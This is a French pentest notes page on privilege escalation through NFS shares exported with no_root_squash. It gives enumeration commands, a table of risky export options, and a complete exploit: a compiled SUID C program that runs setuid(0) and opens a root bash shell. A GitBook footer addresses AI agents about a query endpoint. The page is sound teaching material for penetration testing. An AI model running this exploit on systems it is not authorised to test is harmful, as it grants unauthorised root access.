> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/nfs-shares.md).

# Partages NFS

Des exports NFS mal configurés peuvent permettre une escalade locale de privilèges lorsqu’un partage inscriptible est exporté avec des options dangereuses telles que `no_root_squash`. Dans ce cas, root sur la machine attaquante peut créer des fichiers sur le partage qui conservent la propriété root lorsqu’ils sont accessibles depuis la cible.

## Méthodologie

* Énumérez les exports NFS depuis la machine cible et la machine attaquante.
* Recherchez des partages inscriptibles et des options d’export dangereuses telles que `no_root_squash` ou `no_all_squash`.
* Montez le partage depuis une machine attaquante et créez le plus petit proof of concept SUID nécessaire pour valider l’impact.

## Vérifications rapides

Sur la cible :

```bash
cat /etc/exports
showmount -e localhost
grep no_root_squash /etc/exports
```

Depuis une machine attaquante :

```bash
showmount -e target_ip
```

## Options d’export dangereuses

| Option                   | Risque                                                                                 |
| ------------------------ | -------------------------------------------------------------------------------------- |
| `no_root_squash`         | Le root distant peut conserver la propriété root sur les fichiers créés dans l’export. |
| `rw`                     | Autorise l’écriture dans le partage exporté.                                           |
| `no_all_squash`          | Les utilisateurs peuvent conserver leur mappage UID/GID d’origine.                     |
| Plages de clients larges | Davantage d’hôtes peuvent monter l’export et interagir avec lui.                       |

## Schéma d’exploitation

Sur la machine attaquante :

```bash
mkdir /tmp/nfs
mount -t nfs target_ip:/shared/folder /tmp/nfs
cd /tmp/nfs
cat > privesc.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc privesc.c -o privesc
chmod +s privesc
```

Sur la cible :

```bash
/shared/folder/privesc
```

## Notes de validation

```bash
ls -la /shared/folder/privesc
id
```

Si le binaire n’est pas détenu par root ou si le bit SUID ne persiste pas, l’export écrase probablement root ou est monté avec des options restrictives.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/nfs-shares.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
